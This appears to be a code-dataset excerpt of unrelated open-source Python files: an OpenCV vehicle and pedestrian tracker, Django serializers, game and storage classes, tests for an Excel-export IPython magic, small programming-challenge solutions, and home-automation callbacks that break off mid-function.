| [((401, 429), 'src.util.debugger.Debugger', 'Debugger.Debugger', (['debugFlag'], {}), '(debugFlag)\n', (418, 429), True, 'import src.util.debugger as Debugger\n'), ((571, 616), 'src.util.configmaker.getConfig', 'configmaker.getConfig', (['configpath', 'configtype'], {}), '(configpath, configtype)\n', (592, 616), True, 'import src.util.configmaker as configmaker\n')] |
S0L1DUS/cryptocoinmon | cryptomon/ascii.py | 37b210ca2f93f0b70f160ad903782408dee0f9e9 | # -*- coding: utf-8 -*-
import sys
from cryptomon.common import Colors
if sys.version_info >= (3, 0):
import io
else:
import StringIO as io
ascii_title = """
/$$$$$$ /$$ /$$ /$$
/$$__ $$ | $$ | $$$ /$$$
| $$ \__/ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$$$ /$$$$ /$$$$$$ /$$$$$$$
| $$ /$$__ $$| $$ | $$ /$$__ $$|_ $$_/ /$$__ $$| $$ $$/$$ $$ /$$__ $$| $$__ $$
| $$ | $$ \__/| $$ | $$| $$ \ $$ | $$ | $$ \ $$| $$ $$$| $$| $$ \ $$| $$ \ $$
| $$ $$| $$ | $$ | $$| $$ | $$ | $$ /$$| $$ | $$| $$\ $ | $$| $$ | $$| $$ | $$
| $$$$$$/| $$ | $$$$$$$| $$$$$$$/ | $$$$/| $$$$$$/| $$ \/ | $$| $$$$$$/| $$ | $$
\______/ |__/ \____ $$| $$____/ \___/ \______/ |__/ |__/ \______/ |__/ |__/
/$$ | $$| $$
| $$$$$$/| $$
\______/ |__/
"""
def process_title(title):
buf = io.StringIO(title)
lines = buf.readlines()
lines = lines[1:-1]
colored_lines = []
colored_title = ""
for line in lines:
colored_lines.append(Colors.BLUE + line[:13] + Colors.YELLOW + line[14:])
for line in colored_lines:
colored_title += line
return colored_title + Colors.ENDLINE
| [((1247, 1265), 'StringIO.StringIO', 'io.StringIO', (['title'], {}), '(title)\n', (1258, 1265), True, 'import StringIO as io\n')] |
Ishita-2001/Car-And-Pedestrian-prediction | car & pedestrian_tracker.py | 6c4aeca84ae49d40ff6d27e51800c6f50db55070 | import cv2
video=cv2.VideoCapture(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.mp4')
#pre trained pedestrian and car classifier
car_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\car.xml')
pedestrian_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.xml')
#create car n pedestrian classifier
car_tracker=cv2.CascadeClassifier(car_tracker_file)
pedestrian_tracker=cv2.CascadeClassifier(pedestrian_tracker_file)
#run forever untill car stop
while True:
(read_successful,frame)=video.read()
gr_frame=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
#detect cars n pedestrian
cars=car_tracker.detectMultiScale(gr_frame)
pedestrians=pedestrian_tracker.detectMultiScale(gr_frame)
#draw rectangle around cars
for(x,y,w,h) in cars:
cv2.rectangle(frame,(x+1,y+2),(x+w,y+h),(255,0,0),2)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),2)
#draw rectangle around pedestrian
for(x,y,w,h) in pedestrians:
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2)
#display
cv2.imshow('car n pedestrians',frame)
key = cv2.waitKey(1)
#stopping condition
if key == 83 or key== 115:
break
# release the VideoCapture object
video.release()
print('Press "s" to stop')
print('Hey!')
| [((18, 114), 'cv2.VideoCapture', 'cv2.VideoCapture', (['"""C:\\\\Users\\\\ISHITA\\\\Desktop\\\\ML project\\\\UEM_PROJECT_COM\\\\pedestrian.mp4"""'], {}), "(\n 'C:\\\\Users\\\\ISHITA\\\\Desktop\\\\ML project\\\\UEM_PROJECT_COM\\\\pedestrian.mp4')\n", (34, 114), False, 'import cv2\n'), ((374, 413), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['car_tracker_file'], {}), '(car_tracker_file)\n', (395, 413), False, 'import cv2\n'), ((433, 479), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['pedestrian_tracker_file'], {}), '(pedestrian_tracker_file)\n', (454, 479), False, 'import cv2\n'), ((584, 623), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2GRAY'], {}), '(frame, cv2.COLOR_BGR2GRAY)\n', (596, 623), False, 'import cv2\n'), ((1097, 1135), 'cv2.imshow', 'cv2.imshow', (['"""car n pedestrians"""', 'frame'], {}), "('car n pedestrians', frame)\n", (1107, 1135), False, 'import cv2\n'), ((1145, 1159), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (1156, 1159), False, 'import cv2\n'), ((834, 902), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x + 1, y + 2)', '(x + w, y + h)', '(255, 0, 0)', '(2)'], {}), '(frame, (x + 1, y + 2), (x + w, y + h), (255, 0, 0), 2)\n', (847, 902), False, 'import cv2\n'), ((895, 955), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x, y)', '(x + w, y + h)', '(0, 0, 255)', '(2)'], {}), '(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\n', (908, 955), False, 'import cv2\n'), ((1028, 1090), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x, y)', '(x + w, y + h)', '(0, 255, 255)', '(2)'], {}), '(frame, (x, y), (x + w, y + h), (0, 255, 255), 2)\n', (1041, 1090), False, 'import cv2\n')] |
glosoftgroup/tenants | saleor/wing/api/serializers.py | a6b229ad1f6d567b7078f83425a532830b71e1bb | # site settings rest api serializers
from rest_framework import serializers
from saleor.wing.models import Wing as Table
class TableListSerializer(serializers.ModelSerializer):
update_url = serializers.HyperlinkedIdentityField(view_name='wing:api-update')
delete_url = serializers.HyperlinkedIdentityField(view_name='wing:api-delete')
text = serializers.SerializerMethodField()
class Meta:
model = Table
fields = ('id',
'name',
'text',
'description',
'update_url',
'delete_url'
)
def get_text(self, obj):
try:
return obj.name
except:
return ''
class CreateListSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def create(self, validated_data):
instance = Table()
instance.name = validated_data.get('name')
if validated_data.get('description'):
instance.description = validated_data.get('description')
instance.save()
return instance
class UpdateSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def update(self, instance, validated_data):
instance.name = validated_data.get('name', instance.name)
instance.description = validated_data.get('description', instance.description)
instance.save()
return instance
| [((197, 262), 'rest_framework.serializers.HyperlinkedIdentityField', 'serializers.HyperlinkedIdentityField', ([], {'view_name': '"""wing:api-update"""'}), "(view_name='wing:api-update')\n", (233, 262), False, 'from rest_framework import serializers\n'), ((280, 345), 'rest_framework.serializers.HyperlinkedIdentityField', 'serializers.HyperlinkedIdentityField', ([], {'view_name': '"""wing:api-delete"""'}), "(view_name='wing:api-delete')\n", (316, 345), False, 'from rest_framework import serializers\n'), ((357, 392), 'rest_framework.serializers.SerializerMethodField', 'serializers.SerializerMethodField', ([], {}), '()\n', (390, 392), False, 'from rest_framework import serializers\n'), ((989, 996), 'saleor.wing.models.Wing', 'Table', ([], {}), '()\n', (994, 996), True, 'from saleor.wing.models import Wing as Table\n')] |
TheFamiliarScoot/open-toontown | toontown/fishing/FishCollection.py | 678313033174ea7d08e5c2823bd7b473701ff547 | from . import FishBase
from . import FishGlobals
class FishCollection:
def __init__(self):
self.fishList = []
def __len__(self):
return len(self.fishList)
def getFish(self):
return self.fishList
def makeFromNetLists(self, genusList, speciesList, weightList):
self.fishList = []
for genus, species, weight in zip(genusList, speciesList, weightList):
self.fishList.append(FishBase.FishBase(genus, species, weight))
def getNetLists(self):
genusList = []
speciesList = []
weightList = []
for fish in self.fishList:
genusList.append(fish.getGenus())
speciesList.append(fish.getSpecies())
weightList.append(fish.getWeight())
return [genusList, speciesList, weightList]
def hasFish(self, genus, species):
for fish in self.fishList:
if fish.getGenus() == genus and fish.getSpecies() == species:
return 1
return 0
def hasGenus(self, genus):
for fish in self.fishList:
if fish.getGenus() == genus:
return 1
return 0
def __collect(self, newFish, updateCollection):
for fish in self.fishList:
if fish.getGenus() == newFish.getGenus() and fish.getSpecies() == newFish.getSpecies():
if fish.getWeight() < newFish.getWeight():
if updateCollection:
fish.setWeight(newFish.getWeight())
return FishGlobals.COLLECT_NEW_RECORD
else:
return FishGlobals.COLLECT_NO_UPDATE
if updateCollection:
self.fishList.append(newFish)
return FishGlobals.COLLECT_NEW_ENTRY
def collectFish(self, newFish):
return self.__collect(newFish, updateCollection=1)
def getCollectResult(self, newFish):
return self.__collect(newFish, updateCollection=0)
def __str__(self):
numFish = len(self.fishList)
txt = 'Fish Collection (%s fish):' % numFish
for fish in self.fishList:
txt += '\n' + str(fish)
return txt
| [] |
M4gicT0/Distribute | lead/strategies/strategy_base.py | af903cdf6ae271f4b1152007ea4ba3928af57936 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
#
# Distributed under terms of the MIT license.
"""
Strategy base class
"""
from abc import ABCMeta, abstractmethod
from tinydb import TinyDB, Query
from node import Node
import json
class Strategy(object):
def __init__(self, this_controller, this_description=None):
self.description = this_description
self.controller = this_controller
self.ledger = TinyDB("ledger.json")
self.db = TinyDB("nodes.json")
self.nodes = []
@abstractmethod
def store_file(self, file_bytes, file_name):
pass
@abstractmethod
def retrieve_file(self, file_name, locations):
pass
@abstractmethod
def get_time(self):
pass
def getNodes(self):
self.nodes = []
for item in self.db:
node = Node(item['mac'],item['ip'],item['port'],item['units'])
self.nodes.append(node)
return self.nodes
def getNodesWithFile(self,filename):
macs = self.ledger.search(Query().file_name == filename)
self.nodes = []
for item in macs:
mac = item["location"]
dbnode = self.db.get(Query().mac == mac)
if(dbnode == None):
continue
node = Node(dbnode['mac'],dbnode['ip'],dbnode['port'],dbnode['units'])
self.nodes.append(node)
return self.nodes
def getFileSize(self, filename):
file = self.ledger.get(Query().file_name == filename)
return file['size']
| [((449, 470), 'tinydb.TinyDB', 'TinyDB', (['"""ledger.json"""'], {}), "('ledger.json')\n", (455, 470), False, 'from tinydb import TinyDB, Query\n'), ((489, 509), 'tinydb.TinyDB', 'TinyDB', (['"""nodes.json"""'], {}), "('nodes.json')\n", (495, 509), False, 'from tinydb import TinyDB, Query\n'), ((857, 915), 'node.Node', 'Node', (["item['mac']", "item['ip']", "item['port']", "item['units']"], {}), "(item['mac'], item['ip'], item['port'], item['units'])\n", (861, 915), False, 'from node import Node\n'), ((1296, 1362), 'node.Node', 'Node', (["dbnode['mac']", "dbnode['ip']", "dbnode['port']", "dbnode['units']"], {}), "(dbnode['mac'], dbnode['ip'], dbnode['port'], dbnode['units'])\n", (1300, 1362), False, 'from node import Node\n'), ((1051, 1058), 'tinydb.Query', 'Query', ([], {}), '()\n', (1056, 1058), False, 'from tinydb import TinyDB, Query\n'), ((1491, 1498), 'tinydb.Query', 'Query', ([], {}), '()\n', (1496, 1498), False, 'from tinydb import TinyDB, Query\n'), ((1200, 1207), 'tinydb.Query', 'Query', ([], {}), '()\n', (1205, 1207), False, 'from tinydb import TinyDB, Query\n')] |
mudit-chopra/Python | project_euler/problem_01/sol6.py | 5d186f16d1f6d497c95c28c0ced7134314f65168 | '''
Problem Statement:
If we list all the natural numbers below 10 that are multiples of 3 or 5,
we get 3,5,6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below N.
'''
from __future__ import print_function
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
'''store multiples of 3 and 5 in a set and then add'''
n = int(input().strip())
l = set()
x = 3
y = 5
while(x<n):
l.add(x)
x+=3
while(y<n):
l.add(y)
y+=5
print(sum(l))
| [] |
laymonage/django-jsonfallback | jsonfallback/functions.py | 6e70edd2dbab7d74230e4af48d160ea8c6a663fb | import copy
from django.db import NotSupportedError
from django.db.models import Expression
from .fields import mysql_compile_json_path, postgres_compile_json_path, FallbackJSONField
class JSONExtract(Expression):
def __init__(self, expression, *path, output_field=FallbackJSONField(), **extra):
super().__init__(output_field=output_field)
self.path = path
self.source_expression = self._parse_expressions(expression)[0]
self.extra = extra
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
c.source_expression = c.source_expression.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_postgresql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
params = []
arg_sql, arg_params = compiler.compile(self.source_expression)
params.extend(arg_params)
json_path = postgres_compile_json_path(self.path)
params.append(json_path)
template = '{} #> %s'.format(arg_sql)
return template, params
def as_mysql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
params = []
arg_sql, arg_params = compiler.compile(self.source_expression)
params.extend(arg_params)
json_path = mysql_compile_json_path(self.path)
params.append(json_path)
template = 'JSON_EXTRACT({}, %s)'.format(arg_sql)
return template, params
def as_sql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
raise NotSupportedError(
'Functions on JSONFields are only supported on PostgreSQL and MySQL at the moment.'
)
def copy(self):
c = super().copy()
c.source_expression = copy.copy(self.source_expression)
c.extra = self.extra.copy()
return c
| [((1727, 1839), 'django.db.NotSupportedError', 'NotSupportedError', (['"""Functions on JSONFields are only supported on PostgreSQL and MySQL at the moment."""'], {}), "(\n 'Functions on JSONFields are only supported on PostgreSQL and MySQL at the moment.'\n )\n", (1744, 1839), False, 'from django.db import NotSupportedError\n'), ((1930, 1963), 'copy.copy', 'copy.copy', (['self.source_expression'], {}), '(self.source_expression)\n', (1939, 1963), False, 'import copy\n')] |
pmbaumgartner/excelify | excelify/tests.py | c0e29733efe407248810c3a8d3ec874f0cc0daca | import unittest
import tempfile
import pathlib
import datetime
import warnings
from IPython.testing.globalipapp import start_ipython, get_ipython
import pandas.util.testing as tm
from pandas.core.frame import DataFrame
from pandas.core.series import Series
from pandas import read_excel
import pytest
ip = get_ipython()
ip.magic('load_ext excelify')
class TestMagicExportImport(unittest.TestCase):
def setUp(self):
self.tempexcel = tempfile.NamedTemporaryFile(suffix='.xlsx')
def test_series(self):
series = Series()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
loaded_series = read_excel(excel_name, squeeze=True, dtype=series.dtype)
tm.assert_series_equal(series, loaded_series, check_names=False)
def test_dataframe(self):
df = DataFrame()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'df -f {filepath}'.format(filepath=excel_name))
loaded_df = read_excel(excel_name, dtype=df.dtypes)
tm.assert_frame_equal(df, loaded_df, check_names=False)
def test_sheet_name(self):
series = Series()
excel_name = self.tempexcel.name
sheetname = 'test_sheet_name'
ip.run_line_magic('excel', 'series -f {filepath} -s {sheetname}'.format(filepath=excel_name, sheetname=sheetname))
loaded_excel = read_excel(excel_name, sheet_name=None)
assert 'test_sheet_name' in loaded_excel
def test_all_pandas_objects(self):
df1 = DataFrame()
df2 = DataFrame()
series1 = Series()
series2 = Series()
pandas_objects = [(name, obj) for (name, obj) in locals().items()
if isinstance(obj, (DataFrame, Series))]
excel_name = self.tempexcel.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
for (name, obj) in pandas_objects:
if isinstance(obj, Series):
loaded_data = read_excel(excel_name, sheet_name=name, squeeze=True, dtype=obj.dtype)
tm.assert_series_equal(obj, loaded_data, check_names=False)
elif isinstance(obj, DataFrame):
loaded_data = read_excel(excel_name, sheet_name=name, dtype=obj.dtypes)
tm.assert_frame_equal(obj, loaded_data, check_names=False)
def test_sheet_timestamp(self):
series = Series()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
loaded_excel = read_excel(excel_name, sheet_name=None)
sheet_names = list(loaded_excel.keys())
for sheet in sheet_names:
_, date_string = sheet.split('_')
saved_date = datetime.datetime.strptime(date_string, "%Y%m%d-%H%M%S")
load_to_read = datetime.datetime.now() - saved_date
# there is probably a better way to test this
assert load_to_read.seconds < 10
def test_all_long_name(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
locals().update({'a' * 33 : Series()})
excel_name = self.tempexcel.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def test_long_name_provided(self):
with warnings.catch_warnings(record=True) as w:
series = Series()
excel_name = self.tempexcel.name
longsheet = 'a' * 33
ip.run_line_magic('excel', 'series -f {filepath} -s {longsheet}'.format(filepath=excel_name, longsheet=longsheet))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def test_long_name_default(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
longsheet = 'a' * 33
locals().update({longsheet : Series()})
excel_name = self.tempexcel.name
ip.run_line_magic('excel', '{longsheet} -f {filepath}'.format(longsheet=longsheet, filepath=excel_name))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def tearDown(self):
self.tempexcel.close()
def test_filename():
series = Series()
ip.run_line_magic('excel', 'series')
excel_name = list(pathlib.Path().glob('series_*.xlsx'))[0]
assert excel_name.exists()
excel_name.unlink()
def test_all_filename():
series = Series()
df = DataFrame()
ip.run_line_magic('excel_all', '')
excel_name = list(pathlib.Path().glob('all_data_*.xlsx'))[0]
assert excel_name.exists()
excel_name.unlink()
@pytest.fixture
def no_extension_file():
file = tempfile.NamedTemporaryFile()
yield file
file.close()
def test_filepath_append(no_extension_file):
series = Series()
excel_name = no_extension_file.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
exported_filepath = pathlib.PurePath(excel_name + '.xlsx')
assert exported_filepath.suffix == '.xlsx'
def test_all_filepath_append(no_extension_file):
series = Series()
df = DataFrame()
excel_name = no_extension_file.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
exported_filepath = pathlib.Path(excel_name + '.xlsx')
exported_filepath = pathlib.PurePath(excel_name + '.xlsx')
assert exported_filepath.suffix == '.xlsx'
def test_no_object():
with pytest.raises(NameError):
ip.run_line_magic('excel', 'nonexistantobject')
def test_non_pandas_object():
integer = 3
with pytest.raises(TypeError):
ip.run_line_magic('excel', 'integer')
string = 'string'
with pytest.raises(TypeError):
ip.run_line_magic('excel', 'string')
def test_all_no_objects():
with pytest.raises(RuntimeError):
ip.run_line_magic('excel_all', '')
def test_all_too_many_objects():
# this seems like a bad idea...
for i in range(102):
locals().update({'series' + str(i) : Series()})
with pytest.raises(RuntimeError):
ip.run_line_magic('excel_all', '')
| [((310, 323), 'IPython.testing.globalipapp.get_ipython', 'get_ipython', ([], {}), '()\n', (321, 323), False, 'from IPython.testing.globalipapp import start_ipython, get_ipython\n'), ((4574, 4582), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (4580, 4582), False, 'from pandas.core.series import Series\n'), ((4781, 4789), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (4787, 4789), False, 'from pandas.core.series import Series\n'), ((4799, 4810), 'pandas.core.frame.DataFrame', 'DataFrame', ([], {}), '()\n', (4808, 4810), False, 'from pandas.core.frame import DataFrame\n'), ((5024, 5053), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {}), '()\n', (5051, 5053), False, 'import tempfile\n'), ((5145, 5153), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (5151, 5153), False, 'from pandas.core.series import Series\n'), ((5301, 5339), 'pathlib.PurePath', 'pathlib.PurePath', (["(excel_name + '.xlsx')"], {}), "(excel_name + '.xlsx')\n", (5317, 5339), False, 'import pathlib\n'), ((5454, 5462), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (5460, 5462), False, 'from pandas.core.series import Series\n'), ((5472, 5483), 'pandas.core.frame.DataFrame', 'DataFrame', ([], {}), '()\n', (5481, 5483), False, 'from pandas.core.frame import DataFrame\n'), ((5628, 5662), 'pathlib.Path', 'pathlib.Path', (["(excel_name + '.xlsx')"], {}), "(excel_name + '.xlsx')\n", (5640, 5662), False, 'import pathlib\n'), ((5687, 5725), 'pathlib.PurePath', 'pathlib.PurePath', (["(excel_name + '.xlsx')"], {}), "(excel_name + '.xlsx')\n", (5703, 5725), False, 'import pathlib\n'), ((450, 493), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".xlsx"""'}), "(suffix='.xlsx')\n", (477, 493), False, 'import tempfile\n'), ((539, 547), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (545, 547), False, 'from pandas.core.series import Series\n'), ((700, 756), 'pandas.read_excel', 'read_excel', (['excel_name'], {'squeeze': '(True)', 'dtype': 'series.dtype'}), '(excel_name, squeeze=True, dtype=series.dtype)\n', (710, 756), False, 'from pandas import read_excel\n'), ((765, 829), 'pandas.util.testing.assert_series_equal', 'tm.assert_series_equal', (['series', 'loaded_series'], {'check_names': '(False)'}), '(series, loaded_series, check_names=False)\n', (787, 829), True, 'import pandas.util.testing as tm\n'), ((874, 885), 'pandas.core.frame.DataFrame', 'DataFrame', ([], {}), '()\n', (883, 885), False, 'from pandas.core.frame import DataFrame\n'), ((1030, 1069), 'pandas.read_excel', 'read_excel', (['excel_name'], {'dtype': 'df.dtypes'}), '(excel_name, dtype=df.dtypes)\n', (1040, 1069), False, 'from pandas import read_excel\n'), ((1078, 1133), 'pandas.util.testing.assert_frame_equal', 'tm.assert_frame_equal', (['df', 'loaded_df'], {'check_names': '(False)'}), '(df, loaded_df, check_names=False)\n', (1099, 1133), True, 'import pandas.util.testing as tm\n'), ((1183, 1191), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (1189, 1191), False, 'from pandas.core.series import Series\n'), ((1417, 1456), 'pandas.read_excel', 'read_excel', (['excel_name'], {'sheet_name': 'None'}), '(excel_name, sheet_name=None)\n', (1427, 1456), False, 'from pandas import read_excel\n'), ((1560, 1571), 'pandas.core.frame.DataFrame', 'DataFrame', ([], {}), '()\n', (1569, 1571), False, 'from pandas.core.frame import DataFrame\n'), ((1586, 1597), 'pandas.core.frame.DataFrame', 'DataFrame', ([], {}), '()\n', (1595, 1597), False, 'from pandas.core.frame import DataFrame\n'), ((1616, 1624), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (1622, 1624), False, 'from pandas.core.series import Series\n'), ((1643, 1651), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (1649, 1651), False, 'from pandas.core.series import Series\n'), ((2440, 2448), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (2446, 2448), False, 'from pandas.core.series import Series\n'), ((2600, 2639), 'pandas.read_excel', 'read_excel', (['excel_name'], {'sheet_name': 'None'}), '(excel_name, sheet_name=None)\n', (2610, 2639), False, 'from pandas import read_excel\n'), ((5805, 5829), 'pytest.raises', 'pytest.raises', (['NameError'], {}), '(NameError)\n', (5818, 5829), False, 'import pytest\n'), ((5943, 5967), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (5956, 5967), False, 'import pytest\n'), ((6047, 6071), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (6060, 6071), False, 'import pytest\n'), ((6155, 6182), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {}), '(RuntimeError)\n', (6168, 6182), False, 'import pytest\n'), ((6387, 6414), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {}), '(RuntimeError)\n', (6400, 6414), False, 'import pytest\n'), ((2793, 2849), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date_string', '"""%Y%m%d-%H%M%S"""'], {}), "(date_string, '%Y%m%d-%H%M%S')\n", (2819, 2849), False, 'import datetime\n'), ((3065, 3101), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {'record': '(True)'}), '(record=True)\n', (3088, 3101), False, 'import warnings\n'), ((3120, 3151), 'warnings.simplefilter', 'warnings.simplefilter', (['"""always"""'], {}), "('always')\n", (3141, 3151), False, 'import warnings\n'), ((3532, 3568), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {'record': '(True)'}), '(record=True)\n', (3555, 3568), False, 'import warnings\n'), ((3596, 3604), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (3602, 3604), False, 'from pandas.core.series import Series\n'), ((4005, 4041), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {'record': '(True)'}), '(record=True)\n', (4028, 4041), False, 'import warnings\n'), ((4060, 4091), 'warnings.simplefilter', 'warnings.simplefilter', (['"""always"""'], {}), "('always')\n", (4081, 4091), False, 'import warnings\n'), ((2031, 2101), 'pandas.read_excel', 'read_excel', (['excel_name'], {'sheet_name': 'name', 'squeeze': '(True)', 'dtype': 'obj.dtype'}), '(excel_name, sheet_name=name, squeeze=True, dtype=obj.dtype)\n', (2041, 2101), False, 'from pandas import read_excel\n'), ((2118, 2177), 'pandas.util.testing.assert_series_equal', 'tm.assert_series_equal', (['obj', 'loaded_data'], {'check_names': '(False)'}), '(obj, loaded_data, check_names=False)\n', (2140, 2177), True, 'import pandas.util.testing as tm\n'), ((2877, 2900), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2898, 2900), False, 'import datetime\n'), ((6367, 6375), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (6373, 6375), False, 'from pandas.core.series import Series\n'), ((2253, 2310), 'pandas.read_excel', 'read_excel', (['excel_name'], {'sheet_name': 'name', 'dtype': 'obj.dtypes'}), '(excel_name, sheet_name=name, dtype=obj.dtypes)\n', (2263, 2310), False, 'from pandas import read_excel\n'), ((2327, 2385), 'pandas.util.testing.assert_frame_equal', 'tm.assert_frame_equal', (['obj', 'loaded_data'], {'check_names': '(False)'}), '(obj, loaded_data, check_names=False)\n', (2348, 2385), True, 'import pandas.util.testing as tm\n'), ((3192, 3200), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (3198, 3200), False, 'from pandas.core.series import Series\n'), ((4166, 4174), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (4172, 4174), False, 'from pandas.core.series import Series\n'), ((4646, 4660), 'pathlib.Path', 'pathlib.Path', ([], {}), '()\n', (4658, 4660), False, 'import pathlib\n'), ((4872, 4886), 'pathlib.Path', 'pathlib.Path', ([], {}), '()\n', (4884, 4886), False, 'import pathlib\n')] |
lw7360/dailyprogrammer | Easy/233/233.py | 7a0a4bdf20dd22ca96713958b479d963a15b09f5 | # https://www.reddit.com/r/dailyprogrammer/comments/3ltee2/20150921_challenge_233_easy_the_house_that_ascii/
import random
import sys
def main():
data = open(sys.argv[1]).read().splitlines()[1::]
door = random.randrange(len(data[-1]))
wideData = []
for row in data:
curStr = ''
for ast in row:
if ast == '*':
curStr += '*****'
else:
curStr += ' '
wideData.append(curStr)
longData = []
for row in wideData:
longData.append(row[:])
longData.append(row[:])
longData.append(row[:])
for row in longData:
print row
if __name__ == "__main__":
main()
| [] |
uwitec/LEHome | usr/callbacks/action/tools.py | a959a2fe64a23c58de7c0ff3254eae8c27732320 | #!/usr/bin/env python
# encoding: utf-8
from __future__ import division
from decimal import Decimal
import subprocess
import threading
import urllib2
import urllib
import httplib
import json
import re
import hashlib
import base64
# import zlib
from lib.command.runtime import UserInput
from lib.helper.CameraHelper import CameraHelper
from lib.sound import Sound
from util import Util
from util.Res import Res
from util.log import *
from lib.model import Callback
class timer_callback(Callback.Callback):
def callback(self, cmd, action, target, msg):
if msg is None:
self._home.publish_msg(cmd, u"时间格式错误")
return False, None
if msg.endswith(u'点') or \
msg.endswith(u'分'):
t = Util.gap_for_timestring(msg)
elif msg.endswith(u"秒"):
t = int(Util.cn2dig(msg[:-1]))
elif msg.endswith(u"分钟"):
t = int(Util.cn2dig(msg[:-2]))*60
elif msg.endswith(u"小时"):
t = int(Util.cn2dig(msg[:-2]))*60*60
else:
self._home.publish_msg(cmd, u"时间格式错误")
return False
if t is None:
self._home.publish_msg(cmd, u"时间格式错误")
return False, None
DEBUG("thread wait for %d sec" % (t, ))
self._home.publish_msg(cmd, action + target + msg)
threading.current_thread().waitUtil(t)
if threading.current_thread().stopped():
return False
self._home.setResume(True)
count = 7
Sound.notice( Res.get_res_path("sound/com_bell"), True, count)
self._home.setResume(False)
return True
class translate_callback(Callback.Callback):
base_url = "http://fanyi.youdao.com/openapi.do"
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入内容, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if msg is None:
self._home.publish_msg(cmd, u"无翻译内容")
elif len(msg) > 200:
self._home.publish_msg(cmd, u"翻译内容过长(<200字)")
else:
try:
values = {
"keyfrom":"11111testt111",
"key":"2125866912",
"type":"data",
"doctype":"json",
"version":"1.1",
"q":msg.encode("utf-8")
}
url = translate_callback.base_url + "?" + urllib.urlencode(values)
res = urllib2.urlopen(url).read()
res = " ".join(json.loads(res)["translation"])
self._home.publish_msg(cmd, u"翻译结果:\n" + res)
except Exception, ex:
ERROR("request error:", ex)
self._home.publish_msg(cmd, u"翻译失败")
return True
return True
class baidu_wiki_callback(Callback.Callback):
base_url = "http://wapbaike.baidu.com"
def searchWiki(self, word, time=10):
value = {"word": word.encode("utf-8")}
url = baidu_wiki_callback.base_url + \
"/search?" + urllib.urlencode(value)
try:
response = urllib2.urlopen(url, timeout=time)
html = response.read().encode("utf-8")
response.close()
real_url = None
content = None
m = re.compile(r"URL=(.+)'>").search(html)
if m:
real_url = m.group(1)
else:
return None, None
real_url = real_url[:real_url.index("?")]
if not real_url is None:
url = baidu_wiki_callback.base_url + real_url
